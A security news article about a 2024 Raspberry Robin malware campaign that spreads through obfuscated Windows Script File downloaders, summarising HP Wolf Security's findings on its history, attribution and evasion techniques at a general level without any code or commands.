In a recent discovery by cybersecurity researchers, a new wave of the Raspberry Robin malware campaign has been found, using malicious Windows Script Files (WSFs) as its propagation method since March 2024. This marks a shift from its previous distribution through USB drives, with the malware's distributors now experimenting with other initial infection vectors.

Patrick Schläpfer, a researcher at HP Wolf Security, states that Raspberry Robin, also known as QNAP worm, was first identified in September 2021. Since then, it has evolved into a downloader for various other payloads including SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot. Additionally, it has served as a precursor for ransomware attacks.

Originally, the malware was distributed via USB devices containing LNK files that retrieved the payload from a compromised QNAP device. However, it has now adopted new methods such as social engineering and malvertising to spread. The Raspberry Robin campaign is attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, with links to notorious cybercriminal groups like Evil Corp, Silence, and TA505.

In the latest distribution vector, WSF files are being offered for download through various domains and subdomains. The details of how the attackers direct victims to these URLs remain unclear, but it is suspected that spam or malvertising campaigns play a role in luring unsuspecting users.

The WSF file in question is heavily obfuscated and functions as a downloader, retrieving the main DLL payload from a remote server using the curl command. However, before executing the payload, the malware carries out a series of anti-analysis and anti-virtual machine checks to determine if it is being run in a virtualized environment.

Furthermore, the malware is designed to terminate execution if the Windows operating system's build number is lower than 17063 (released in December 2017) or if antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky are detected in the list of running processes. To evade detection, the malware also configures Microsoft Defender Antivirus exclusion rules, adding the entire main drive to the exclusion list and preventing it from being scanned.

HP warns that the malicious WSF files are currently not detected as harmful by any antivirus scanners on VirusTotal, highlighting the evasiveness of the malware and the potential risk it poses in causing serious infections with Raspberry Robin. The heavily obfuscated nature of the WSF downloader allows the malware to avoid detection and hinder analysis.

As cybersecurity researchers continue their investigations, it is crucial for users and organizations to remain vigilant, keep their systems and software updated, and exercise caution when downloading files or clicking on suspicious links to mitigate the risk of falling victim to this evolving Raspberry Robin malware campaign.